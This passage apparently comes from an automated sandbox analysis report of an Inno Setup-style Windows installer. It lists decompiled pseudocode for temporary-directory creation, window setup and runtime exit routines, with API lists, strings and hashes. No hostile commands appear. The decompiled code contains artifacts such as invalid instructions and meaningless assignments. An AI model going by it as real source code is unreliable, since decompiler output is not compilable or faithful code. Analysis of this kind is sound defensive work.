                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ExceptionRaise
                                                                    • String ID: P\l$p\l
                                                                    • API String ID: 3997070919-2963016475
                                                                    • Opcode ID: aa0e87082271f6f024034dc3e0c9ed7691aad24ca827c03d937f00bb865530d3
                                                                    • Instruction ID: dea4787ea8a346106a271a8220094215500c3d30852de538169348a6bce77c0f
                                                                    • Opcode Fuzzy Hash: aa0e87082271f6f024034dc3e0c9ed7691aad24ca827c03d937f00bb865530d3
                                                                    • Instruction Fuzzy Hash: EDA18D75A003099FDB24CFA9D881BEEBBB6EB58310F14452AE505A7390DBB4E9C1CF54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006AC8CC, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 102COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 77%
                                                                    			E006AC8CC(long __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char* _t40;
				intOrPtr _t41;
				int _t47;
				intOrPtr _t77;
				void* _t80;
				intOrPtr _t81;
				intOrPtr _t94;
				intOrPtr _t107;
				intOrPtr _t108;

				_t105 = __esi;
				_t104 = __edi;
				_t79 = __ebx;
				_t107 = _t108;
				_t80 = 6;
				do {
					_push(0);
					_push(0);
					_t80 = _t80 - 1;
				} while (_t80 != 0);
				_push(_t80);
				_push(__ebx);
				_push(_t107);
				_push(0x6aca22);
				_push( *[fs:eax]);
				 *[fs:eax] = _t108;
				E0060D530( &_v20, __ebx, __edx, __edi, __esi); // executed
				E0040A5A8(0x6d6530, _v20);
				_t81 =  *0x6d6530; // 0x0
				E0040B4C8( &_v24, _t81, L"Created temporary directory: ");
				E00616130(_v24, _t79, __edi, __esi);
				_t40 =  *0x6cdfdc; // 0x6d62e4
				if( *_t40 != 0) {
					_t77 =  *0x6d6530; // 0x0
					E0061583C(_t77);
				}
				_t41 =  *0x6d6530; // 0x0
				E005C4EA4(_t41,  &_v28);
				E0040B4C8( &_v8, L"_isetup", _v28);
				_t47 = CreateDirectoryW(E0040B278(_v8), 0); // executed
				if(_t47 == 0) {
					_t79 = GetLastError();
					E005CD508(0x3d,  &_v48, _v8);
					_v44 = _v48;
					E0042302C( &_v52, _t61, 0);
					_v40 = _v52;
					E005C857C(_t79,  &_v56);
					_v36 = _v56;
					E005CD4D8(0x81, 2,  &_v44,  &_v32);
					E00429008(_v32, 1);
					E004098C4();
				}
				E0062554C( &_v12);
				_t113 = _v12;
				if(_v12 != 0) {
					E0040B4C8( &_v16, L"\\_setup64.tmp", _v8);
					E006AC874(_v12, _t79, _v16, _t104, _t105, _t113); // executed
					E006255A4(_v16);
				}
				_pop(_t94);
				 *[fs:eax] = _t94;
				_push(E006ACA29);
				E0040A228( &_v56, 3);
				return E0040A228( &_v32, 7);
			}

























                                                                    0x006ac8cc
                                                                    0x006ac8cc
                                                                    0x006ac8cc
                                                                    0x006ac8cd
                                                                    0x006ac8cf
                                                                    0x006ac8d4
                                                                    0x006ac8d4
                                                                    0x006ac8d6
                                                                    0x006ac8d8
                                                                    0x006ac8d8
                                                                    0x006ac8db
                                                                    0x006ac8dc
                                                                    0x006ac8df
                                                                    0x006ac8e0
                                                                    0x006ac8e5
                                                                    0x006ac8e8
                                                                    0x006ac8ee
                                                                    0x006ac8fb
                                                                    0x006ac903
                                                                    0x006ac90e
                                                                    0x006ac916
                                                                    0x006ac91b
                                                                    0x006ac923
                                                                    0x006ac925
                                                                    0x006ac92a
                                                                    0x006ac92a
                                                                    0x006ac932
                                                                    0x006ac937
                                                                    0x006ac947
                                                                    0x006ac957
                                                                    0x006ac95e
                                                                    0x006ac965
                                                                    0x006ac975
                                                                    0x006ac97d
                                                                    0x006ac989
                                                                    0x006ac991
                                                                    0x006ac999
                                                                    0x006ac9a1
                                                                    0x006ac9b0
                                                                    0x006ac9bf
                                                                    0x006ac9c4
                                                                    0x006ac9c4
                                                                    0x006ac9cc
                                                                    0x006ac9d1
                                                                    0x006ac9d5
                                                                    0x006ac9e2
                                                                    0x006ac9ed
                                                                    0x006ac9f5
                                                                    0x006ac9f5
                                                                    0x006ac9fc
                                                                    0x006ac9ff
                                                                    0x006aca02
                                                                    0x006aca0f
                                                                    0x006aca21

                                                                    APIs
                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,006ACA22,?,?,00000005,00000000,00000000,?,006B92B5,00000000,006B946A,?,00000000,006B94CE), ref: 006AC957
                                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,006ACA22,?,?,00000005,00000000,00000000,?,006B92B5,00000000,006B946A,?,00000000,006B94CE), ref: 006AC960
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CreateDirectoryErrorLast
                                                                    • String ID: Created temporary directory: $\_setup64.tmp$_isetup$bm
                                                                    • API String ID: 1375471231-4222912607
                                                                    • Opcode ID: e237758f4fd82c383e0ca560b4e3332f66906f72f2642b2f4657cc3014f73248
                                                                    • Instruction ID: fab29f73b12df9647497e51388a78cad5e0a4b86d3a417c00642db4583a337af
                                                                    • Opcode Fuzzy Hash: e237758f4fd82c383e0ca560b4e3332f66906f72f2642b2f4657cc3014f73248
                                                                    • Instruction Fuzzy Hash: 00412E34A102099BDB01FBA4D891AEEB7B6FF89704F50417AF501B7391DA34AE458B64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006C4660, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 65%
                                                                    			_entry_() {
				intOrPtr* _t12;
				signed int _t15;
				intOrPtr _t21;
				intOrPtr* _t22;
				intOrPtr* _t28;
				intOrPtr* _t31;
				intOrPtr* _t35;
				intOrPtr _t36;
				void* _t61;
				void* _t62;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr _t77;
				intOrPtr _t79;
				intOrPtr _t81;
				intOrPtr _t82;
				intOrPtr _t83;
				void* _t84;
				void* _t86;
				intOrPtr* _t88;
				intOrPtr _t89;
				void* _t90;
				intOrPtr _t92;
				void* _t93;

				E00410BA8(0x6b9a98);
				_t12 =  *0x6cdec4; // 0x6d579c
				_t15 = GetWindowLongW( *( *_t12 + 0x188), 0xffffffec);
				_t73 =  *0x6cdec4; // 0x6d579c
				SetWindowLongW( *( *_t73 + 0x188), 0xffffffec, _t15 & 0xffffff7f); // executed
				_push(_t88);
				_push(0x6c46f1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t89;
				SetErrorMode(1); // executed
				E006B9800(_t90);
				_t21 =  *0x6b96c0; // 0x6b9718
				_t22 =  *0x6cdec4; // 0x6d579c
				E005B8740( *_t22, E006B9758, _t21);
				_t76 =  *0x6cdd3c; // 0x6d57d8
				 *_t76 = 0x6b4380;
				E006B9870(_t62, _t84, _t86, _t90, _t93);
				_pop(_t77);
				 *[fs:eax] = _t77;
				_t28 =  *0x6cdec4; // 0x6d579c
				E005B8250( *_t28, L"Setup", _t90);
				_t31 =  *0x6cdec4; // 0x6d579c
				ShowWindow( *( *_t31 + 0x188), 5);
				_t35 =  *0x6cdec4; // 0x6d579c
				_t36 =  *_t35;
				_t79 =  *0x6a6ef4; // 0x6a6f4c
				 *((intOrPtr*)(_t36 + 0x10c)) = _t79;
				 *((intOrPtr*)(_t36 + 0x108)) = 0x6b3994;
				_push(_t88);
				_push(0x6c479a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t89;
				E005B881C(); // executed
				L006B09B0(_t62, _t84, _t86, _t93);
				L005B8834( *((intOrPtr*)( *0x6cdec4)), _t62,  *0x6cdab4,  *0x6a6ef4, _t84, _t86);
				L006B3B64(_t90, _t93);
				_pop(_t81);
				 *[fs:eax] = _t81;
				_push(_t88);
				_push(0x6c481d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t89;
				L005B8990( *((intOrPtr*)( *0x6cdec4)), _t62, _t84, _t86);
				_pop(_t82);
				 *[fs:eax] = _t82;
				_push(_t88);
				_push(0x6c4854);
				_push( *[fs:eax]);
				 *[fs:eax] = _t89;
				L006B2AB0( *0x6cdcd4 & 0xffffff00 |  *( *0x6cdcd4) == 0x00000000, _t62, _t84, _t86,  *( *0x6cdcd4));
				_pop(_t83);
				 *[fs:eax] = _t83;
				_t61 = E0040A028( *( *0x6cdcd4));
				E00409EF8();
				 *((intOrPtr*)(_t61 - 0xfffdfc)) =  *((intOrPtr*)(_t61 - 0xfffdfc)) + _t83;
				asm("invalid");
				 *0x53000000 =  *0x53000000 + 1;
				 *_t88 =  *_t88 + _t61;
				_t92 =  *_t88;
				if (_t92 == 0) goto L5;
				if (_t92 != 0) goto L6;
				if (_t92 < 0) goto 0x6c488e;
			}



























                                                                    0x006c466e
                                                                    0x006c4673
                                                                    0x006c4683
                                                                    0x006c4688
                                                                    0x006c469f
                                                                    0x006c46a6
                                                                    0x006c46a7
                                                                    0x006c46ac
                                                                    0x006c46af
                                                                    0x006c46b4
                                                                    0x006c46b9
                                                                    0x006c46be
                                                                    0x006c46c9
                                                                    0x006c46d0
                                                                    0x006c46da
                                                                    0x006c46e0
                                                                    0x006c46e2
                                                                    0x006c46e9
                                                                    0x006c46ec
                                                                    0x006c470a
                                                                    0x006c4716
                                                                    0x006c471d
                                                                    0x006c472b
                                                                    0x006c4730
                                                                    0x006c4735
                                                                    0x006c4737
                                                                    0x006c473d
                                                                    0x006c4743
                                                                    0x006c474f
                                                                    0x006c4750
                                                                    0x006c4755
                                                                    0x006c4758
                                                                    0x006c4762
                                                                    0x006c4767
                                                                    0x006c477f
                                                                    0x006c478b
                                                                    0x006c4792
                                                                    0x006c4795
                                                                    0x006c47fb
                                                                    0x006c47fc
                                                                    0x006c4801
                                                                    0x006c4804
                                                                    0x006c480e
                                                                    0x006c4815
                                                                    0x006c4818
                                                                    0x006c482e
                                                                    0x006c482f
                                                                    0x006c4834
                                                                    0x006c4837
                                                                    0x006c4845
                                                                    0x006c484c
                                                                    0x006c484f
                                                                    0x006c486a
                                                                    0x006c4872
                                                                    0x006c4877
                                                                    0x006c487d
                                                                    0x006c487f
                                                                    0x006c4885
                                                                    0x006c4885
                                                                    0x006c4888
                                                                    0x006c488a
                                                                    0x006c488c

                                                                    APIs
                                                                      • Part of subcall function 00410BA8: GetModuleHandleW.KERNEL32(00000000,?,006C4673), ref: 00410BB4
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 006C4683
                                                                    • SetWindowLongW.USER32 ref: 006C469F
                                                                    • SetErrorMode.KERNEL32(00000001,00000000,006C46F1,?,?,000000EC,00000000), ref: 006C46B4
                                                                      • Part of subcall function 006B9800: GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,006C46BE,00000001,00000000,006C46F1,?,?,000000EC,00000000), ref: 006B980A
                                                                      • Part of subcall function 005B8740: SendMessageW.USER32(?,0000B020,00000000,?), ref: 005B8765
                                                                      • Part of subcall function 005B8250: SetWindowTextW.USER32(?,00000000), ref: 005B8281
                                                                    • ShowWindow.USER32(?,00000005,00000000,006C46F1,?,?,000000EC,00000000), ref: 006C472B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Window$HandleLongModule$ErrorMessageModeSendShowText
                                                                    • String ID: Loj$Setup
                                                                    • API String ID: 1533765661-1180797960
                                                                    • Opcode ID: 17f777bc5e0ddd78fa34bb04f44403f63e29e5f52b8ab729edceb4b8c292e480
                                                                    • Instruction ID: d4d45baa3e9a68820d1f8b3b63154724c7fffc608bd47f906fb52fcab16a7fb3
                                                                    • Opcode Fuzzy Hash: 17f777bc5e0ddd78fa34bb04f44403f63e29e5f52b8ab729edceb4b8c292e480
                                                                    • Instruction Fuzzy Hash: BE216D782046009FD700EF29DC91DA67BFAEB9E71071145B8F9008B3A2CE74BC80CB64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00409EF8, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93threadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 86%
                                                                    			E00409EF8() {
				void* _t20;
				void* _t23;
				intOrPtr _t31;
				intOrPtr* _t33;
				void* _t46;
				struct HINSTANCE__* _t49;
				void* _t56;

				if( *0x6c5004 != 0) {
					E00409DD8();
					E00409E60(_t46);
					 *0x6c5004 = 0;
				}
				if( *0x6d1bd0 != 0 && GetCurrentThreadId() ==  *0x6d1bf8) {
					E00409B30(0x6d1bcc);
					E00409E34(0x6d1bcc);
				}
				if( *0x006D1BC4 != 0 ||  *0x6cf058 == 0) {
					L8:
					if( *((char*)(0x6d1bc4)) == 2 &&  *0x6c5000 == 0) {
						 *0x006D1BA8 = 0;
					}
					if( *((char*)(0x6d1bc4)) != 0) {
						L14:
						E00409B58(); // executed
						if( *((char*)(0x6d1bc4)) <= 1 ||  *0x6c5000 != 0) {
							_t15 =  *0x006D1BAC;
							if( *0x006D1BAC != 0) {
								E0040EBB8(_t15);
								_t31 =  *((intOrPtr*)(0x6d1bac));
								_t8 = _t31 + 0x10; // 0x400000
								_t49 =  *_t8;
								_t9 = _t31 + 4; // 0x400000
								if(_t49 !=  *_t9 && _t49 != 0) {
									FreeLibrary(_t49);
								}
							}
						}
						E00409B30(0x6d1b9c);
						if( *((char*)(0x6d1bc4)) == 1) {
							 *0x006D1BC0();
						}
						if( *((char*)(0x6d1bc4)) != 0) {
							E00409E34(0x6d1b9c);
						}
						if( *0x6d1b9c == 0) {
							if( *0x6cf038 != 0) {
								 *0x6cf038();
							}
							ExitProcess( *0x6c5000); // executed
						}
						memcpy(0x6d1b9c,  *0x6d1b9c, 0xc << 2);
						_t56 = _t56 + 0xc;
						0x6c5000 = 0x6c5000;
						0x6d1b9c = 0x6d1b9c;
						goto L8;
					} else {
						_t20 = E00406FD0();
						_t44 = _t20;
						if(_t20 == 0) {
							goto L14;
						} else {
							goto L13;
						}
						do {
							L13:
							E00408444(_t44);
							_t23 = E00406FD0();
							_t44 = _t23;
						} while (_t23 != 0);
						goto L14;
					}
				} else {
					do {
						_t33 =  *0x6cf058; // 0x0
						 *0x6cf058 = 0;
						 *_t33();
					} while ( *0x6cf058 != 0);
					L8:
					while(1) {
					}
				}
			}










                                                                    0x00409f0c
                                                                    0x00409f0e
                                                                    0x00409f13
                                                                    0x00409f1a
                                                                    0x00409f1a
                                                                    0x00409f26
                                                                    0x00409f3a
                                                                    0x00409f44
                                                                    0x00409f44
                                                                    0x00409f4d
                                                                    0x00409f71
                                                                    0x00409f75
                                                                    0x00409f7e
                                                                    0x00409f7e
                                                                    0x00409f85
                                                                    0x00409fa4
                                                                    0x00409fa4
                                                                    0x00409fad
                                                                    0x00409fb4
                                                                    0x00409fb9
                                                                    0x00409fbb
                                                                    0x00409fc0
                                                                    0x00409fc3
                                                                    0x00409fc3
                                                                    0x00409fc6
                                                                    0x00409fc9
                                                                    0x00409fd0
                                                                    0x00409fd0
                                                                    0x00409fc9
                                                                    0x00409fb9
                                                                    0x00409fd7
                                                                    0x00409fe0
                                                                    0x00409fe2
                                                                    0x00409fe2
                                                                    0x00409fe9
                                                                    0x00409fed
                                                                    0x00409fed
                                                                    0x00409ff5
                                                                    0x00409ffe
                                                                    0x0040a000
                                                                    0x0040a000
                                                                    0x0040a009
                                                                    0x0040a009
                                                                    0x0040a01b
                                                                    0x0040a01b
                                                                    0x0040a01d
                                                                    0x0040a01e
                                                                    0x00000000
                                                                    0x00409f87
                                                                    0x00409f87
                                                                    0x00409f8c
                                                                    0x00409f90
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00409f92
                                                                    0x00409f92
                                                                    0x00409f94
                                                                    0x00409f99
                                                                    0x00409f9e
                                                                    0x00409fa0
                                                                    0x00000000
                                                                    0x00409f92
                                                                    0x00409f58
                                                                    0x00409f58
                                                                    0x00409f58
                                                                    0x00409f61
                                                                    0x00409f66
                                                                    0x00409f68
                                                                    0x00000000
                                                                    0x00409f71
                                                                    0x00000000
                                                                    0x00409f71

                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00409F28
                                                                    • FreeLibrary.KERNEL32(00400000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 00409FD0
                                                                    • ExitProcess.KERNEL32(00000000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 0040A009
                                                                      • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
                                                                      • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
                                                                      • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
                                                                      • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                    • String ID: MZP
                                                                    • API String ID: 3490077880-2889622443
                                                                    • Opcode ID: 19759392ed06106502a1c1b2e6486d6f2820d04f59653749a07cc7070f676968
                                                                    • Instruction ID: e2cc099636b1ff89dc3d2fe7d8b391202ea9480b4d839bd65efd70e323d436a8
                                                                    • Opcode Fuzzy Hash: 19759392ed06106502a1c1b2e6486d6f2820d04f59653749a07cc7070f676968
                                                                    • Instruction Fuzzy Hash: 60316F20B006429AD720AB7A9484B2777E66B44328F14053FE449E62E3D7BCDCC4C75D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00409EF0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86threadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 86%
                                                                    			E00409EF0() {
				intOrPtr* _t14;
				void* _t23;
				void* _t26;
				intOrPtr _t34;
				intOrPtr* _t36;
				void* _t50;
				struct HINSTANCE__* _t53;
				void* _t62;

				 *((intOrPtr*)(_t14 +  *_t14)) =  *((intOrPtr*)(_t14 +  *_t14)) + _t14 +  *_t14;
				if( *0x6c5004 != 0) {
					E00409DD8();
					E00409E60(_t50);
					 *0x6c5004 = 0;
				}
				if( *0x6d1bd0 != 0 && GetCurrentThreadId() ==  *0x6d1bf8) {
					E00409B30(0x6d1bcc);
					E00409E34(0x6d1bcc);
				}
				if( *0x006D1BC4 != 0 ||  *0x6cf058 == 0) {
					L9:
					if( *((char*)(0x6d1bc4)) == 2 &&  *0x6c5000 == 0) {
						 *0x006D1BA8 = 0;
					}
					if( *((char*)(0x6d1bc4)) != 0) {
						L15:
						E00409B58(); // executed
						if( *((char*)(0x6d1bc4)) <= 1 ||  *0x6c5000 != 0) {
							_t18 =  *0x006D1BAC;
							if( *0x006D1BAC != 0) {
								E0040EBB8(_t18);
								_t34 =  *((intOrPtr*)(0x6d1bac));
								_t8 = _t34 + 0x10; // 0x400000
								_t53 =  *_t8;
								_t9 = _t34 + 4; // 0x400000
								if(_t53 !=  *_t9 && _t53 != 0) {
									FreeLibrary(_t53);
								}
							}
						}
						E00409B30(0x6d1b9c);
						if( *((char*)(0x6d1bc4)) == 1) {
							 *0x006D1BC0();
						}
						if( *((char*)(0x6d1bc4)) != 0) {
							E00409E34(0x6d1b9c);
						}
						if( *0x6d1b9c == 0) {
							if( *0x6cf038 != 0) {
								 *0x6cf038();
							}
							ExitProcess( *0x6c5000); // executed
						}
						memcpy(0x6d1b9c,  *0x6d1b9c, 0xc << 2);
						_t62 = _t62 + 0xc;
						0x6c5000 = 0x6c5000;
						0x6d1b9c = 0x6d1b9c;
						goto L9;
					} else {
						_t23 = E00406FD0();
						_t48 = _t23;
						if(_t23 == 0) {
							goto L15;
						} else {
							goto L14;
						}
						do {
							L14:
							E00408444(_t48);
							_t26 = E00406FD0();
							_t48 = _t26;
						} while (_t26 != 0);
						goto L15;
					}
				} else {
					do {
						_t36 =  *0x6cf058; // 0x0
						 *0x6cf058 = 0;
						 *_t36();
					} while ( *0x6cf058 != 0);
					L9:
					while(1) {
					}
				}
			}











                                                                    0x00409ef2
                                                                    0x00409f0c
                                                                    0x00409f0e
                                                                    0x00409f13
                                                                    0x00409f1a
                                                                    0x00409f1a
                                                                    0x00409f26
                                                                    0x00409f3a
                                                                    0x00409f44
                                                                    0x00409f44
                                                                    0x00409f4d
                                                                    0x00409f71
                                                                    0x00409f75
                                                                    0x00409f7e
                                                                    0x00409f7e
                                                                    0x00409f85
                                                                    0x00409fa4
                                                                    0x00409fa4
                                                                    0x00409fad
                                                                    0x00409fb4
                                                                    0x00409fb9
                                                                    0x00409fbb
                                                                    0x00409fc0
                                                                    0x00409fc3
                                                                    0x00409fc3
                                                                    0x00409fc6
                                                                    0x00409fc9
                                                                    0x00409fd0
                                                                    0x00409fd0
                                                                    0x00409fc9
                                                                    0x00409fb9
                                                                    0x00409fd7
                                                                    0x00409fe0
                                                                    0x00409fe2
                                                                    0x00409fe2
                                                                    0x00409fe9
                                                                    0x00409fed
                                                                    0x00409fed
                                                                    0x00409ff5
                                                                    0x00409ffe
                                                                    0x0040a000
                                                                    0x0040a000
                                                                    0x0040a009
                                                                    0x0040a009
                                                                    0x0040a01b
                                                                    0x0040a01b
                                                                    0x0040a01d
                                                                    0x0040a01e
                                                                    0x00000000
                                                                    0x00409f87
                                                                    0x00409f87
                                                                    0x00409f8c
                                                                    0x00409f90
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00409f92
                                                                    0x00409f92
                                                                    0x00409f94
                                                                    0x00409f99
                                                                    0x00409f9e
                                                                    0x00409fa0
                                                                    0x00000000
                                                                    0x00409f92
                                                                    0x00409f58
                                                                    0x00409f58
                                                                    0x00409f58
                                                                    0x00409f61
                                                                    0x00409f66
                                                                    0x00409f68
                                                                    0x00000000
                                                                    0x00409f71
                                                                    0x00000000
                                                                    0x00409f71

                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00409F28
                                                                    • FreeLibrary.KERNEL32(00400000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 00409FD0
                                                                    • ExitProcess.KERNEL32(00000000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 0040A009
                                                                      • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
                                                                      • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
                                                                      • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
                                                                      • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
